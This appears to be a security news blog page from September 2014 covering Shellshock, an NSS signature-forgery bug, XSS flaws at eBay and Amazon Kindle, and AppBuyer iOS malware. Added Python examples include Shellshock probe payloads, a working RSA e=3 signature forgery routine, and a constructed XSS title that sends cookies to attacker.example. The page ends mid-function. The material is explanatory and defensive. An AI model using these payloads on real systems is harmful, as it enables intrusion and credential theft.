::Trend Micro Threat Resource Center::

30 September 2014

Apple releases bash patch to plug 'Shellshock' security flaw in OS X Mavericks, Mountain Lion, Lion

As promised, Apple on Monday issued OS X bash Update 1.0 for OS X Mavericks, Mountain Lion and Lion, targeting the recently discovered "Shellshock" security flaw originating in the bash UNIX shell.


Following revelations that Shellshock was in the wild, Apple last Friday said that, while most consumers would go unaffected, it was working to patch the problem. That fix was released today for OS X 10.9 Mavericks, OS X 10.8 Mountain Lion and OS X 10.7 Lion.

"This update fixes a security flaw in the bash UNIX shell."

The bug, dubbed "Shellshock" by the computer security community, is believed to have been present in every version of bash since the shell's inception in 1989. Via a remote attack, malicious users could issue commands to an affected computer with the intent of gathering information, modifying system files and more.

"With OS X, systems are safe by default and not exposed to remote exploits of bash unless users configure advanced UNIX services," an Apple spokesperson said last week, adding that the company is "working to quickly provide a software update for our advanced UNIX users."

Mac owners running Mavericks can download the 3.4MB patch from Apple's Support website, as can users running Mountain Lion and Lion. For Mountain Lion, the fix comes in at 34.3MB, while the Lion download clocks in at 3.5MB. Alternatively, the patch is available through Software Update.

27 September 2014

What you need to know about Shellshock (a.k.a Bash Bug)

The Shellshock vulnerability (also known as Bash Bug) will have a widespread impact for any organization or user that has Bash enabled on a server, desktop, or device. This includes over 500 million web servers on the Internet today. Shellshock (CVE-2014-6271 and CVE-2014-7169) is found in Bash, the default shell on most Linux and many Unix systems, and bash is also present on Mac OS X, some Windows server deployments, and even Android.

Wherever a network-facing service passes attacker-controlled input into an environment variable that bash then parses on start-up (CGI scripts on web servers are the common case), it enables remote execution of arbitrary commands without authentication, which can be used to take over the operating system, access confidential data, or set the stage for further attacks.

Simply put, the vulnerability allows attackers to run malicious scripts on systems and servers, compromising everything on them. It has the potential to do significant widespread damage, since it affects Linux, BSD, and Mac OS X. Linux alone powers a majority of the servers on the Internet and of IoT (Internet of Things) devices.

What is the threat extent and who are affected?
Shellshock creates a weak spot that serves as a backdoor for a hacker to carry out commands, take over a machine, dig into servers, steal data and deface websites. Internet-enabled home devices such as routers, Wi-Fi radios, and even smart light bulbs running Linux may also be affected, but only if their firmware actually ships bash: many embedded Linux devices use a lighter shell such as BusyBox's ash instead, so each device has to be checked rather than assumed vulnerable.

Webcams, for example, are often Linux-based, and these devices can also be hacked and used as infection vectors. The problem extends to smart devices connected to the Internet of Everything, located anywhere and everywhere, including hospitals, the energy sector, and schools. This means that even a minor vulnerability in one device could open the door to an attack.

What can you do?
Be alert and recognize the scope and scale of Shellshock. Whether it's as notorious as they say or not, a healthy paranoia can make you more cautious and proactive about interconnected devices that could be vulnerable to attack. Update all firmware and operating systems, and install security updates. Use Shellshock detection tools or plug-ins to scan for vulnerable hosts and exploit attempts. For system admins: patch your systems immediately and closely track your network activity.
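The local checks and the remote vector described above, as an added example in Python (this is not Trend Micro's code, nor any of the detection tools the text refers to). It runs the two widely published probes for CVE-2014-6271 and CVE-2014-7169 against whatever bash is on the PATH, and simulates what made bash CGI scripts remotely exploitable: a web server copies request headers such as User-Agent into environment variables (HTTP_USER_AGENT), which an unpatched bash parsed as a function definition and then kept executing. The request headers and marker strings are constructed for the demo; on a patched bash every probe reports False, and None means no bash binary was found to test.

```python
"""Added example, not from Trend Micro: local Shellshock probes and a
simulation of the CGI vector. Safe to run: the payloads only echo a marker."""
import os
import shutil
import subprocess
import tempfile

# Minimal environment so the probes do not inherit our own exported functions.
BASE_ENV = {"PATH": os.environ.get("PATH", "/usr/bin:/bin")}


def _run(cmd, env, cwd=None):
    """Run cmd with exactly the given environment; return stdout+stderr."""
    p = subprocess.run(cmd, env=env, cwd=cwd, capture_output=True,
                       text=True, timeout=15)
    return p.stdout + p.stderr


def check_cve_2014_6271(bash="bash"):
    """Unpatched bash imports any env var shaped '() { ...}' as a function
    and keeps parsing, so the trailing command runs. True = vulnerable,
    False = patched, None = no bash binary available to test."""
    if shutil.which(bash) is None:
        return None
    env = dict(BASE_ENV, x="() { :;}; echo SHELLSHOCK-6271")
    return "SHELLSHOCK-6271" in _run([bash, "-c", "echo probe"], env)


def check_cve_2014_7169(bash="bash"):
    """The first fix was incomplete: a stray redirection in the env var left
    the parser in a state where 'echo date' became 'date > echo', creating a
    file named 'echo' in the working directory. Same return convention."""
    if shutil.which(bash) is None:
        return None
    env = dict(BASE_ENV, X="() { (a)=>\\")
    with tempfile.TemporaryDirectory() as d:
        _run([bash, "-c", "echo date"], env, cwd=d)
        return os.path.exists(os.path.join(d, "echo"))


def cgi_environ(headers):
    """How a web server hands request headers to a CGI program (RFC 3875):
    'User-Agent: v' becomes HTTP_USER_AGENT=v. No authentication is needed
    to control these values, which is why Shellshock was remotely exploitable."""
    env = dict(BASE_ENV)
    for name, value in headers.items():
        env["HTTP_" + name.upper().replace("-", "_")] = value
    return env


def cgi_probe(bash="bash"):
    """Run a harmless bash CGI handler with a Shellshock payload in the
    User-Agent header (constructed request). True only on an unpatched bash."""
    if shutil.which(bash) is None:
        return None
    headers = {"Host": "www.example.test",
               "User-Agent": "() { :; }; echo SHELLSHOCK-CGI"}
    handler = "printf 'Content-Type: text/plain\\r\\n\\r\\nhello\\n'"
    return "SHELLSHOCK-CGI" in _run([bash, "-c", handler], cgi_environ(headers))


if __name__ == "__main__":
    for name, fn in (("CVE-2014-6271", check_cve_2014_6271),
                     ("CVE-2014-7169", check_cve_2014_7169),
                     ("CGI header vector", cgi_probe)):
        print(f"{name}: {fn()}")
```

Because every value in the process environment reaches bash's start-up parser, the same probe applies to anything else that builds an environment from untrusted input (SSH forced commands, DHCP client hooks, CUPS filters); only the header-to-variable mapping changes.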

Learn more about the Bash Bug in the attached infographic:


Facebook Messenger has abundance of permissions

Lately, there has been quite a bit of talk about how Facebook Messenger for Android has an abundance of permissions, permissions that may seem out of the spectrum of what a messenger app should need.

Since Facebook no longer allows users to use its flagship Facebook app to send messages, users must now install the new Facebook Messenger app to regain this functionality.

This isn't the first time questions have arisen about Facebook's long list of permissions. When they first introduced the Facebook app, it came packed with permissions (and it still does).

Let’s first look at the Facebook Messenger app permissions:


In comparison, the Facebook app has all the same permissions, plus Device & app history permissions.

Before you decide to toss Facebook aside and start using Google Hangouts, the messenger for Google Plus, note that it has the same permissions as Facebook Messenger.

The question is whether Facebook, Google, or other well-known companies with apps in the Google Play store need the long list of permissions in their apps.

Let's look at some of the more troubling permissions in Facebook Messenger: location, SMS, camera/microphone, and Device ID & call information.


  • Location permissions are used to show the location you are sending the message from. It's arguable whether this is really necessary, but the function is there.
  • SMS is used when you add a phone number to a Facebook Messenger account: the app confirms the number by sending a confirmation code via text message.
  • Camera permissions let you take a picture to send through Messenger, and microphone permissions let you record and send audio.
  • Device ID & call information is used to initiate outgoing calls so you can call friends and family through the Messenger app.

In other words, Facebook is NOT tracking your every move, NOT reading your SMS messages, NOT using your camera and microphone to spy on you, and NOT tracking all your call information.

Facebook and other companies are going to continue to come out with feature rich apps, and the more features they have, the more permissions they will need.

In an app with no obvious need for them, many of these permissions would be a huge red flag that something fishy might be going on. The difference between good apps and bad apps is how the permissions are used in the code.

It’s the code that contains the malicious intent, but it’s not always easy to tell what permissions are legitimately being used, and which are being exploited.

That’s why we are here to make those hard decisions to keep our customers safe.  So yes, it’s a little scary when apps have an overwhelming list of permissions. This is especially true with social media apps that handle content that some may consider “private”.

One more thing worth mentioning: with all these permissions, you want to make sure you have the correct Facebook Messenger app from the Google Play store.

You'll know it's the right one when you see the package name "com.facebook.orca" with a large number of downloads and reviews. The package name is displayed in the URL on the Google Play site after "id=". It would be bad news to get a knock-off app with this many permissions from a third-party market. Stay safe out there.

26 September 2014

Cyber attack on Japan Airlines impacts up to 750,000


A phishing attack may have resulted in the theft of personal information belonging to customers of Japan Airlines's frequent flier club.

The leak was due to 'unauthorised access' to JAL's database from an external server, an airline official told the local news agency Kyodo on Wednesday.

The data compromised includes names, addresses, genders and places of work of anywhere between 110,000 and 750,000 members of the program, according to the Japan Times.

Following an investigation, which found that 23 computers contained malware, the airline determined that no credit card or financial information was affected by the breach. The airline detected the intrusion on Friday and Monday; however, it believes the attacks went undetected for more than a month and were introduced to the airline's network via a phishing email.

This incident follows a similar attack on the airline in February, in which hackers penetrated a different program Japan Airlines offers, which allows customers to trade in mileage points for gift coupons.

25 September 2014

NEC, Singapore's Economic Development Board partner for cybersecurity training programme

Somehow, I sense that the Government is getting desperate in trying to recruit qualified cyber security personnel at their disposal, thus the collaboration. The partnership comes in the wake of two security breaches in Singapore:

  • A telco user flagged a security flaw in telco M1's iPhone 6 pre-order page that resulted in one case of unauthorised access to its customer database.
  • A group called The Knowns gained access to karaoke entertainment operator K Box's database and published the personal information of more than 317,000 members online.

Nothing wrong with that; in fact I think it is a good news headline to help create cyber security awareness among its citizens. However, I would not pin high hopes on a short 12-month on-the-job-training stint. Very much still depends on how the training is structured, and what kind of experience is gained via the promised training exposure.

==============================================


The Singapore Economic Development Board (EDB) and NEC Corporation will be partnering in a multi-year agreement to build strategic capabilities in cybersecurity through EDB’s Strategic Attachment and Training (STRAT) Programme.

NEC and EDB will seek qualified cybersecurity professionals and graduates to take part in a comprehensive cybersecurity training programme designed to equip them with the needed skills to counter the latest cyber threats.

The training aims to develop key in-depth skills and cybersecurity capabilities in areas of malware analysis, incident response, intrusion detection, digital forensics and vulnerability assessment.

The STRAT Programme aims to build up Singapore's manpower capabilities in strategic areas and sectors through overseas training and attachment with leading companies, and is open to Singaporean citizens and permanent residents.

The one-year programme will involve cybersecurity training locally, as well as with one of NEC’s Security Operations Centres (SOC) in Japan, which will focus on developing cyber operator, analyst and incident responder skills.

Training options also include working at one of NEC’s Regional Competency Centres or at an international partner agency, which will provide on-the-job-training in technical support for cyber operations, cyber forensics and malware analysis. Trainees will also have the option of working at NEC’s research laboratories on research and development projects.

The global shortage of qualified cybersecurity professionals has been highlighted in numerous reports. According to a McKinsey and World Economic Forum report, delays in adopting cybersecurity capabilities could result in a loss of US$3 trillion (S$3.75 trillion) in economic value by 2020 globally. A global study by Frost & Sullivan highlights that hacking, cyber-terrorism and hacktivism are the top concerns identified by organizations, yet more than half feel their security organizations are short-staffed.

The signing ceremony for the partnership between EDB and NEC was held at Governmentware 2014 on 24 September 2014, at the Suntec Singapore International Convention & Exhibition Centre.

“Within a year, trainees will get a unique opportunity to acquire skills in different functions of security operations, research and forensics. This wide exposure will be an invaluable experience for trainees as it will equip them to be proficient for the wide range of job roles within the field of cybersecurity," said Gian Yi-Hsen, Director of Safety & Security Industry Programme Office (SSIPO).

“The demand for skilled talent is critical in the current environment, and we are committed to ensuring our identified trainees receive the relevant training that will broaden their exposure and sharpen their skills to counteract the sophisticated cybersecurity challenges of today,” said Tan Boon Chin, Managing Director, Global Safety Division, NEC Corporation.

Source: http://www.channelnewsasia.com/news/business/edb-nec-partner-up-to/1378456.html

Mozilla fixes "phishing friendly" cryptographic bug in Firefox and Thunderbird

Here's a quick note about an important issue!

Mozilla just patched a bug in its cryptographic library, NSS.

NSS stands for Network Security Services, used by Mozilla products such as Firefox (web browsing), Thunderbird (email) and SeaMonkey (both).

All these products have now been patched, including the Firefox Extended Support Release (ESR) versions.

→ As far as I am aware, Google's Chrome and Chromium browsers, as well as Opera, also use NSS.

The bug is rated "critical" because it deals with the validation of digital signatures in TLS connections.

TLS (Transport Layer Security), often also known by its old name of SSL (Secure Sockets Layer), is the cryptographic protocol that puts the S in HTTPS.

When you use HTTPS, it's not just confidentiality you are after, but also integrity (to stop a crook fiddling with the message in transit) and authenticity (to stop a crook claiming to be your bank).

Without certificate validation, you could easily end up conducting a totally secure and unsniffable interaction...

...with a complete imposter.

Unfortunately, this recently patched NSS vulnerability (CVE-2014-1568, an RSA signature forgery bug) affects digital signature verification in all the above-mentioned products.

Phishing HTTPS logins
Remember that crooks who have hacked into your Wi-Fi access point, at your local coffee shop, for instance, could sneakily redirect any of your HTTPS logins to phishing sites instead.

Usually, however, the crooks can't present a digital certificate to vouch for the fake site they have drawn you into.

Sometimes, the crooks avoid the need for digital certificates altogether by dropping back to a plain old HTTP site that doesn't use encryption at all.

You should be able to spot this sort of ruse due to the absence of any security indicators in the address bar of your browser.



Or the crooks could present a TLS certificate that claims to be from your bank, but which isn't vouched for by any recognised certificate authority.

You should be able to spot this sort of ruse due to an "untrusted connection" warning from your browser.


But if there's a cryptographic vulnerability that can be exploited to make a bogus digital certificate seem valid, then the crooks may be able to redirect you to an imposter site without raising any alarms.

And that could lead to the digital theft of your personal information, including usernames and passwords.
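The page does not describe the NSS bug's internals, so here is an added example, written for this page and not taken from Mozilla or NSS, of the failure class it belonged to: an RSA PKCS#1 v1.5 verifier that only checks the front of the decoded signature block. With a public exponent of 3, anyone can produce a "signature" whose cube starts with the right padding, DigestInfo and hash and then trails off into garbage (Bleichenbacher's 2006 forgery); a verifier that rebuilds the whole expected block and compares every byte rejects it. The key generation, the message standing in for a certificate body, and the 2048-bit size are assumptions made so the demo runs offline.

```python
"""Added example, not from the page or Mozilla: a PKCS#1 v1.5 RSA verifier
that checks only the front of the decoded block is forgeable without the
private key when e = 3 (Bleichenbacher, 2006). Toy key generation is here
only to keep the demo self-contained; never use it for real keys."""
import hashlib
import random

E = 3
# DER prefix of DigestInfo for SHA-256 (RFC 8017, section 9.2, note 1)
SHA256_DIGESTINFO = bytes.fromhex("3031300d060960864801650304020105000420")


def _probable_prime(n, rounds=16):   # Miller-Rabin, adequate for a demo key
    if n < 4 or n % 2 == 0:
        return n in (2, 3)
    d, r = n - 1, 0
    while d % 2 == 0:
        d, r = d // 2, r + 1
    for _ in range(rounds):
        x = pow(random.randrange(2, n - 1), d, n)
        if x in (1, n - 1):
            continue
        for _ in range(r - 1):
            x = x * x % n
            if x == n - 1:
                break
        else:
            return False
    return True


def _random_prime(bits):
    while True:
        p = random.getrandbits(bits) | (1 << (bits - 1)) | 1
        if p % 3 == 2 and _probable_prime(p):   # keeps gcd(E, p - 1) == 1
            return p


def generate_key(bits=2048):
    p, q = _random_prime(bits // 2), _random_prime(bits // 2)
    return p * q, pow(E, -1, (p - 1) * (q - 1))   # (n, d)


def _klen(n):
    return (n.bit_length() + 7) // 8


def emsa_pkcs1_v15(msg, k):
    """EM = 00 01 FF..FF 00 || DigestInfo || SHA-256(msg), exactly k bytes."""
    t = SHA256_DIGESTINFO + hashlib.sha256(msg).digest()
    return b"\x00\x01" + b"\xff" * (k - len(t) - 3) + b"\x00" + t


def sign(msg, n, d):
    return pow(int.from_bytes(emsa_pkcs1_v15(msg, _klen(n)), "big"), d, n)


def verify_strict(msg, sig, n):
    """Correct: rebuild the whole expected encoding and compare every byte."""
    k = _klen(n)
    return pow(sig, E, n).to_bytes(k, "big") == emsa_pkcs1_v15(msg, k)


def verify_lenient(msg, sig, n):
    """Buggy: parse from the front, accept once DigestInfo||hash is seen,
    never check that the hash is the last thing in the block."""
    k = _klen(n)
    em = pow(sig, E, n).to_bytes(k, "big")
    if em[:2] != b"\x00\x01":
        return False
    i = 2
    while i < k and em[i] == 0xFF:
        i += 1
    if i < 10 or i >= k or em[i] != 0x00:      # at least 8 FF bytes, then 00
        return False
    t = SHA256_DIGESTINFO + hashlib.sha256(msg).digest()
    return em[i + 1:i + 1 + len(t)] == t         # trailing bytes ignored: the bug


def _cbrt_ceil(x):
    """Smallest integer s with s**3 >= x (float cbrt is far too imprecise)."""
    lo, hi = 0, 1 << (x.bit_length() // 3 + 2)
    while lo < hi:
        mid = (lo + hi) // 2
        if mid ** 3 < x:
            lo = mid + 1
        else:
            hi = mid
    return lo


def forge(msg, n):
    """No private key needed: pick s so that s**3 (smaller than n, so no
    modular reduction happens) begins with exactly the bytes the lenient
    verifier looks at; the remaining bytes can be anything."""
    k = _klen(n)
    prefix = (b"\x00\x01" + b"\xff" * 8 + b"\x00"
              + SHA256_DIGESTINFO + hashlib.sha256(msg).digest())
    lo = int.from_bytes(prefix + b"\x00" * (k - len(prefix)), "big")
    hi = int.from_bytes(prefix + b"\xff" * (k - len(prefix)), "big")
    s = _cbrt_ceil(lo)
    if s ** 3 > hi:
        raise ValueError("key too small for this forgery")
    return s


if __name__ == "__main__":
    n, d = generate_key()
    msg = b"CN=www.bank.example"   # constructed stand-in for a certificate body
    for label, sig in (("genuine", sign(msg, n, d)), ("forged ", forge(msg, n))):
        print(label, "strict:", verify_strict(msg, sig, n), "lenient:", verify_lenient(msg, sig, n))
```

The forgery works because a 2048-bit modulus leaves roughly 190 bytes after the hash for the verifier to ignore, far more than the gap between consecutive cubes near the cube root of the target; with a 1024-bit key the check in forge() raises instead. The defence is the one in verify_strict(): never parse the decoded block, reconstruct it and compare in full.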

Get the latest update

If you have a software product (e.g. Firefox) that uses NSS, make sure you've got the latest update; for Mozilla software, that means (at 2014-09-24T23:45Z):

  • Firefox 32.0.3
  • Firefox ESR 24.8.1
  • Firefox ESR 31.1.1
  • Thunderbird 31.1.2
  • Thunderbird 24.8.1
  • SeaMonkey 2.29.1

For what it's worth, I'm using Firefox 32 on OS X, and the update was so small I didn't get time to read its size during the download.

Applying the update was quick: less than a second to download the patch, and a few more seconds to restart the browser process.



So my recommendation is, "Just do it."

22 September 2014

Facebook To Begin Charging Users $2.99 / Month'- Totally BULLSHIT!

Facebook going to charge users per month?? Nobody expected such a news story this week, but it seemed that Facebook would no longer be a free service, according to a report by the National Report, "Facebook To Begin Charging Users $2.99/mo Starting November 1st", which turns out to be fake. Thank God!!


This report is circulating via social media and claims that the social networking giant will begin charging $2.99 (€2.33) per month for each user starting November 1, 2014, in an effort to fight the rising costs the company is facing.

Of course, the claims are simply untrue. Facebook has not announced any such plans to begin charging its users a monthly fee for access to the regular site services that has more than 1.3 billion monthly users.

NICELY FRAMED HOAX
The report comes via a 'satirical' fake-news website and is a complete hoax, just like many similar 'Facebook to start charging' hoaxes before it. But what makes it different from those other hoaxes? It's the way it was framed so nicely that it got everybody's attention on the Internet.

“At a press conference this morning, Facebook rolled out their monthly service plan which begins November 1st of this year. The social media giant says they will start charging members $2.99/mo to use the services that the site has to offer,” reads the fake news report.

Not just this, the fake-news article also quoted some fake statements from Facebook CEO Mark Zuckerberg, which made it even more convincing.

“After thinking long and hard about this decision, at the end of the day, we were forced to add this monthly fee,” said Facebook founder and CEO Mark Zuckerberg. “If we don't do something about our rising costs now, Facebook could cease to exist in the near future.”

FACEBOOK IS FREE AND ALWAYS WILL BE
National Report considers itself satirical: its disclaimer says that it is a news and political satire web publication, which may or may not use real names, sometimes in semi-real or wholly fictitious ways. Many are still confused about this because so many fake news stories make their way out of the site and are believed to be true.

The site also reads that every news article on their website is fiction and fake news, which do not relate with the truth in any way. But, the fact that the site presents their news in a manner similar to that of other legitimate news websites makes things much more difficult to distinguish.

Those who believe this story to be true should know that, regardless of all claims that Facebook is about to start charging, these claims are total nonsense. Facebook isn't charging its users for its services, and its own homepage says 'It's free and always will be'.

Always take a moment to verify this kind of sensational claim about Facebook or any other online service. Also, don't spread misinformation and junk to your Facebook friends before confirming the whole thing.

20 September 2014

iPhone 6 Launches Millions of Scam Messages

The new iPhone 6 has gone on sale around the world, sparking long lines and campouts, and a whole lot of buzz. Unsurprisingly, internet scammers quickly took advantage of the frenzy to distribute their wares.


Immediately following the unveiling of the new iPhone 6 and iPhone 6 plus, scammers accordingly began circulating email and web scams attempting to capitalize on its popularity. The gambits however take many forms.

For instance, Hoax-Slayer uncovered a bogus Facebook competition offering the ability to “win a new iPhone 6 by carrying out three easy steps.” To get a chance to win, the site claims that users must first like the site's Facebook Page and then further promote the site by sharing a link with Facebook friends. They are then instructed to go to a second page on the site to download a ‘Participation Application.’ But, a pop-up window will direct users to a list of links that open third-party survey websites.

And here’s where the real malicious activity starts: many of these ask users to submit their mobile number, which, in turn, will subscribe them to a premium SMS service that charges several dollars every time the scammers send the victim a message.

Others collect names, addresses and phone details, which can be used for a variety of nuisance campaigns.

“Meanwhile, the scammer who created the fake promotion will earn a commission via a suspect affiliate marketing scheme each time you fill in a survey and provide your details,” Hoax-Slayer explained. “And, each time you return to the download page, the pop-up will inform you that the survey was not completed properly or there was a 'small error'. You will be urged to participate in yet another survey. But, no matter how many surveys you complete, you will still not get to download your 'application'.”

In one of the many other campaigns, spammers are using an iPhone 6 giveaway email to lure in potential victims; they are asked to follow instructions in the email to click on a link to, yet once again, a survey, but instead, an adware install will commence. Since Sept. 12, AppRiver researchers have seen nearly 1 million messages associated with this specific campaign.

“Adware is a form of software that is meant to generate revenue for its author by automatically displaying advertisements,” explained AppRiver researcher Troy Gill, in a blog. “Adware is not typically anything more than an annoyance but can often seriously infringe on users' privacy. This particular strain has a wide array of functionality and can make a victim’s web browsing experience fairly miserable.”

These types of scams, of course, also carry the possibility of malicious activity in the form of man-in-the-middle attacks, malware deployments and phishing.

“Though its presence is not secret, it is quite good at embedding itself into the victim’s system and can be quite difficult for the average user to remove,” Gill said. “Remember, advertisements promising you something for nothing are almost always too good to be true.”

19 September 2014

eBay Falls Victim to Cross-Site Scripting Attack

The British website of online retailer eBay was compromised through a cross-site scripting (XSS) vulnerability, exploited to steal customers’ login credentials, according to the BBC.
Attackers apparently planted malicious JavaScript code in product listings to redirect eBay customers interested in cheap Apple smartphones to a spoofed eBay welcome page. Once there, they were asked to enter their account username and password.

The incident was first reported by Paul Kerr, an IT worker from Scotland who contacted eBay and was told that the matter would be considered “of the highest level of security”.

However, the company was criticized for its 12-hour response time in fixing the issue.

“eBay is a large company and it should have a 24/7 response team to deal with this – and this case is unambiguously bad,” said Steven Murdoch from University College London’s Information Security Research Group.

In a statement, the retailer said the issue only affected one item listed on the UK site, information questioned by the BBC.

“This report relates only to a ‘single item listing’ on eBay.co.uk whereby the user has included a link which redirects users away from the listing page,” a spokesperson said. “We take the safety of our marketplace very seriously and are removing the listing as it is in violation of our policy on third-party links.”

18 September 2014

Download this Kindle eBook, and have your Amazon account cookies stolen

A security researcher has reported what appears to be an embarrassing flaw on Amazon’s website that could put Kindle users at risk.

Benjamin Daniel Mussler claims that the “Manage Your Content and Devices” and “Manage Your Kindle” services on Amazon’s web-based Kindle Library are vulnerable to a cross-site scripting (XSS) attack, which can be exploited by a boobytrapped eBook title.


Anyone wanting to target a Kindle user would go about their attack by creating an eBook with a specially-crafted title:

When the boobytrapped eBook is added to the intended victim’s library, the code will be automatically executed when the Kindle Library webpage is opened.

According to Mussler this means that “Amazon account cookies can be accessed by and transferred to the attacker and the victim’s Amazon account can be compromised”.
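The pattern behind both the eBay listing story above and this Kindle one is stored cross-site scripting: an attacker-chosen string (a listing body, an eBook title) is saved server-side and later rendered into HTML for a victim. The following added example, written for this page and not taken from eBay, Amazon or Mussler's published code, shows a vulnerable renderer beside a correctly escaped one and a small check for the cookie attribute that would have stopped document.cookie from being readable. The payload, hostname and cookie header are constructed for the demo.

```python
"""Added example, not eBay's or Amazon's code: stored XSS through an
attacker-chosen title, and the per-context escaping that prevents it."""
import html
import re
from urllib.parse import quote

# Constructed attacker-controlled title: the classic cookie-exfiltration shape.
EVIL_TITLE = ("Cheap iPhone 6<script>new Image().src="
              "'https://attacker.example/?c='+document.cookie</script>")

SCRIPT_RE = re.compile(r"<\s*script\b", re.I)


def render_unsafe(title):
    """Interpolates the title verbatim into element text, an attribute and a
    URL: whatever the attacker typed becomes markup in the victim's page."""
    return f'<li title="{title}"><a href="/search?q={title}">{title}</a></li>'


def render_safe(title):
    """Escapes per context: html.escape(quote=True) for text and attribute
    values (covers < > & " '), percent-encoding for the query-string part."""
    t = html.escape(title, quote=True)
    return f'<li title="{t}"><a href="/search?q={quote(title, safe="")}">{t}</a></li>'


def contains_active_script(markup):
    """Detection helper for the demo: is there a <script> tag in the output?"""
    return SCRIPT_RE.search(markup) is not None


def missing_cookie_flags(set_cookie):
    """The Kindle PoC read account cookies via document.cookie, which only
    works when HttpOnly is absent. Returns the protective attributes a
    Set-Cookie header lacks (defence in depth, not a fix for the XSS itself)."""
    attrs = {part.strip().split("=", 1)[0].lower()
             for part in set_cookie.split(";")[1:]}
    return [flag for flag in ("httponly", "secure") if flag not in attrs]


if __name__ == "__main__":
    print(render_unsafe(EVIL_TITLE))
    print(render_safe(EVIL_TITLE))
    # Constructed header in the shape a session cookie might be set with.
    print(missing_cookie_flags("session-id=abc123; Path=/; Domain=.example.com"))
```

Escaping has to match the context the data lands in: the same title needs HTML entity escaping inside element text and attributes but percent-encoding inside a URL, and a template engine that auto-escapes one context does not help in the other. Marking session cookies HttpOnly does not stop the script from running, but it does stop the specific cookie-theft payload the researcher demonstrated.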

The good news is that you’re unlikely to find an eBook with a maliciously-crafted title in the official Kindle eBook store, provided Amazon keeps its eyes open. Instead, the only real chance that you might fall victim to the vulnerability is if you pirate eBooks, downloading them from dodgy sources and use Amazon’s “Send to Kindle” service to have them accessible on your reader.

The bad news, however, is that Mussler says he first reported the vulnerability to Amazon in November 2013, along with a proof-of-concept eBook that grabbed cookies and sent them to him. Amazon's technical team managed to fix the flaw within four days.

Most people would consider that a reasonable response, and a job well done… but there is more to this story.

To Mussler's shock, the very same vulnerability was reintroduced approximately two months ago, and it currently remains unfixed. The researcher informed Amazon that the security hole had re-emerged, but received no response from the company.

For that reason, Mussler has decided to go public with his findings and even published example code on his website that allows anyone to replicate the vulnerability.

Whether you think public disclosure of the vulnerability was the right approach or not is a matter of some debate. One thing is clear, however. Amazon needs to fix the security hole, even if it is only likely to be a risk for a small number of Kindle users, and fix it permanently.

In the meantime, Kindle users are advised to get their eBooks from official stores – just to be on the safe side.


17 September 2014

AppBuyer iOS Malware Steals Apple ID, Password & Buys Apps

Researchers from Palo Alto Networks have discovered an iOS malware sample that affects jailbroken iPhones. The malware is named 'AppBuyer'.


The AppBuyer malware is created and set up in a way that it will steal the user’s Apple ID login and password. Once these credentials have been stolen, the malware will purchase specific applications from the App Store and those behind the malware are utilizing the iOS environment to make some serious money.

The attackers first infect the device; the infected device then uploads the user's Apple ID credentials. Once the attackers have the credentials, they can buy specific applications that generate revenue for them.

The members of the WeiPhone Technical Group, who first mentioned AppBuyer in May, remotely assisted a user in finding out why some apps were periodically installed to his jailbroken device, and later found two strange files on the phone.

They discovered that the suspicious files would execute, download and delete other executable files from the web. They also tried to identify the hacker through analyzing the C&C server’s domain name with the samples. They also released samples for downloading.

WeiPhone Technical Group didn't explain how the samples were installing other apps on infected devices. Meanwhile, the C&C servers are still up and running, which may affect a greater number of users.

Palo Alto Networks analyzed the samples to work out how they operate and to suggest mitigations. The researchers, however, still don't know how the malware was installed on jailbroken Apple devices.

The possibilities include a malicious Cydia Substrate tweak hosted in third-party Cydia sources, a PC jailbreaking utility, other PC malware, or some other as-yet-unknown route.

After a device has been infected, the malware first downloads executable files to generate a unique UDID. Then it downloads a Cydia Substrate tweak that intercepts all HTTP/HTTPS sessions to steal the user's Apple ID and password and upload them to the attacker's server.
Lastly, it downloads a fake gzip utility that logs in to the App Store with the user's Apple ID credentials and buys additional apps. Palo Alto Networks researchers therefore classify AppBuyer as a Trojan.

Defense
Palo Alto Networks researchers highly recommend iOS users to stay away from jailbreaking. They mention AdThief, another iOS malware discovered this year, infecting more than 75,000 devices. Another example is Unflod, a malicious Cydia Substrate tweak that steals the Apple ID credentials of the victim in a similar way.

Users who have already jailbroken their iOS devices should look for one or more of the following files in the device's file system:

• /System/Library/LaunchDaemons/com.archive.plist
• /bin/updatesrv
• /tmp/updatesrv.log
• /etc/uuid
• /Library/MobileSubstrate/DynamicLibraries/aid.dylib
• /usr/bin/gzip

If any of those files is present, the device may be infected with AppBuyer. The exception is /usr/bin/gzip, which exists on every iOS install: it is only suspicious if it has been replaced by AppBuyer's fake copy, so compare it with a known-good one rather than treating its presence as an indicator. However, simply removing these files may not solve the problem, since there is no word yet on how the malware actually got onto the device. Palo Alto Networks says its platform can protect against the malware in several ways.
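A scanner for the indicators listed above, as an added example that is not Palo Alto Networks' code. It checks a filesystem tree for the paths from the list, reads what the LaunchDaemon plist starts at boot (an analyst's first question when a persistence entry is found), and treats /usr/bin/gzip as something to compare with a clean copy rather than as a hit, since that path exists on every device. The root parameter lets it run against a mounted backup or, as in the demo, against a constructed infected tree and an empty one.

```python
"""Added example, not Palo Alto Networks' code: checks a filesystem tree for
the AppBuyer indicators listed on the page and reads the persistence plist."""
import os
import plistlib
import tempfile

IOC_PATHS = [
    "/System/Library/LaunchDaemons/com.archive.plist",
    "/bin/updatesrv",
    "/tmp/updatesrv.log",
    "/etc/uuid",
    "/Library/MobileSubstrate/DynamicLibraries/aid.dylib",
]
REPLACED_BINARY = "/usr/bin/gzip"   # legitimate path AppBuyer overwrote


def _under(root, path):
    return os.path.join(root, path.lstrip("/"))


def scan(root="/"):
    """Return (hits, notes): hits are indicator paths present under root,
    notes flag files that need manual comparison with a known-good copy."""
    hits = [p for p in IOC_PATHS if os.path.lexists(_under(root, p))]
    notes = []
    # gzip is present everywhere, so only mention it when real hits exist.
    if hits and os.path.lexists(_under(root, REPLACED_BINARY)):
        notes.append(REPLACED_BINARY + ": compare hash with a clean device")
    return hits, notes


def launchd_program(root="/"):
    """What the LaunchDaemon plist starts at boot, or None if absent."""
    try:
        with open(_under(root, IOC_PATHS[0]), "rb") as f:
            plist = plistlib.load(f)
    except (OSError, plistlib.InvalidFileException):
        return None
    return plist.get("ProgramArguments") or plist.get("Program")


def build_sample_tree(root):
    """Constructed infected layout for exercising the scanner offline."""
    for p in ("/bin/updatesrv", "/usr/bin/gzip", "/etc/uuid"):
        os.makedirs(os.path.dirname(_under(root, p)), exist_ok=True)
        with open(_under(root, p), "wb") as f:
            f.write(b"\x00")
    plist_path = _under(root, IOC_PATHS[0])
    os.makedirs(os.path.dirname(plist_path), exist_ok=True)
    with open(plist_path, "wb") as f:
        plistlib.dump({"Label": "com.archive",
                       "ProgramArguments": ["/bin/updatesrv"],
                       "RunAtLoad": True}, f)


def demo():
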